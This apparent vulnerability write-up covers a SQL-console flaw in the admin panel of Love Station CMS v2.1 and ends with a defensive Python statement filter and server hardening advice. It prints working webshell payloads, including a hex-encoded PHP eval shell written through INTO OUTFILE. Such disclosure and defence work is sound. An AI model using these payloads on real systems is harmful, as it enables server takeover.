v2.1 code execution vulnerability analysis

Posted by fierce at 2020-04-06

Website source code version: Love Station CMS (Zend 6.0) v2.1

Default user name: admin; password: set by the user

Test website home page:

1. Vulnerability file location:

Lines 185-221 of /admin/application/webset/Controllers/dbcomandcontroller.php:

In this function the submitted SQL parameter is unescaped, the statement is checked for whether it is a DELETE, and the SQL is then processed. Sensitive constructs such as INTO OUTFILE are not filtered at all; the statement is passed straight to the database for execution. A crafted SQL statement can therefore write a webshell to disk, which turns the feature into a code execution vulnerability and gives control of the server.

Log in to the admin backend, then go to System Settings - Database Operations - SQL Statement - Execute SQL Statement.

Problem: the input characters are HTML-entity encoded, so the traditional INTO OUTFILE statement cannot write a usable file.

SELECT '<?php eval($_POST[cmd]);?>' INTO OUTFILE 'C:/www/222aaa.php'

Write failed.

SELECT 111222 INTO OUTFILE 'E:/study/WWW/iZhanCMS/2222.php' LINES TERMINATED BY 0x3C3F70687020406576616C28245F504F53545B2761275D293B3F3E –

The webshell is written successfully and the web server is under the attacker's control.

1. Reduce the privileges of the MySQL database account used by the site, so that an intruder cannot act with high privileges even after reaching the SQL console.
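The root cause described above is that the SQL console only looks for DELETE and otherwise hands the statement to MySQL unchanged, so file-writing clauses reach the server. The following is an added example (not code from the CMS or from this post) of what an application-side guard for such a console should do instead: normalize the statement in a single pass (drop comments, mask string literals), allow only read-type statements by their leading keyword, refuse statement stacking, and reject any clause or function that touches the server filesystem. The sample statements at the bottom are constructed for the demonstration; the `check_statement` helper and its return shape are this example's own design.

```python
import re

# Clauses and functions that read from or write to the server filesystem.
# These are matched on the normalized text, so comments and string contents
# cannot hide or spuriously trigger them.
_FILE_RE = re.compile(
    r"\binto\s+(?:outfile|dumpfile)\b|\bload_file\s*\(|\bload\s+data\b",
    re.I,
)

# Only read-type statements are accepted by this console (allow-list, not a
# DELETE deny-list as in the vulnerable controller).
ALLOWED_LEADING_KEYWORDS = {"select", "show", "describe", "desc", "explain"}


def normalize(sql: str) -> str:
    """Return sql with comments removed, string literals replaced by '?'
    and whitespace collapsed. One left-to-right pass so that quotes inside
    comments and comment markers inside strings are handled in source order."""
    out = []
    i, n = 0, len(sql)
    while i < n:
        c = sql[i]
        two = sql[i:i + 2]
        if two == "/*":                                   # block comment
            end = sql.find("*/", i + 2)
            i = n if end < 0 else end + 2
            out.append(" ")
        elif c == "#" or (two == "--" and (i + 2 >= n or sql[i + 2] in " \t\n")):
            end = sql.find("\n", i)                       # line comment
            i = n if end < 0 else end + 1
            out.append(" ")
        elif c in ("'", '"'):                             # string literal
            j = i + 1
            while j < n:
                if sql[j] == "\\":                        # backslash escape
                    j += 2
                elif sql[j] == c:
                    if j + 1 < n and sql[j + 1] == c:     # doubled quote
                        j += 2
                    else:
                        break
                else:
                    j += 1
            out.append("'?'")
            i = j + 1
        else:
            out.append(c)
            i += 1
    return " ".join("".join(out).split())


def check_statement(sql: str) -> tuple[bool, str]:
    """Decide whether a console statement may be sent to MySQL.
    Returns (allowed, reason)."""
    text = normalize(sql)
    if not text:
        return False, "empty statement"
    body = text.rstrip("; ")
    if ";" in body:
        return False, "multiple statements"
    first = re.match(r"[A-Za-z_]+", body)
    keyword = first.group(0).lower() if first else ""
    if keyword not in ALLOWED_LEADING_KEYWORDS:
        return False, f"statement type '{keyword or body[:10]}' not permitted"
    if _FILE_RE.search(body):
        return False, "filesystem access clause"
    return True, "ok"


# Constructed sample inputs for the demonstration (not taken from the post).
SAMPLES = [
    "SELECT id, name FROM users WHERE name = 'into outfile'",
    "SELECT 1 /* it's */ FROM dual",
    "SHOW TABLES;",
    "SELECT 1 INTO OUTFILE '/var/www/html/x.php'",
    "SELECT LOAD_FILE('/etc/passwd')",
    "DELETE FROM users",
    "SELECT 1; DROP TABLE users",
]

if __name__ == "__main__":
    for statement in SAMPLES:
        allowed, reason = check_statement(statement)
        print(f"{'ALLOW' if allowed else 'DENY ':5} {reason:32} {statement}")
```

The guard is a second line of defence, not a replacement for the privilege reduction recommended above: the MySQL account the CMS connects with should not hold the FILE privilege, and `secure_file_priv` on the server should be set so that INTO OUTFILE cannot target the web root at all. With both in place, a filter bypass in the console no longer yields a file write.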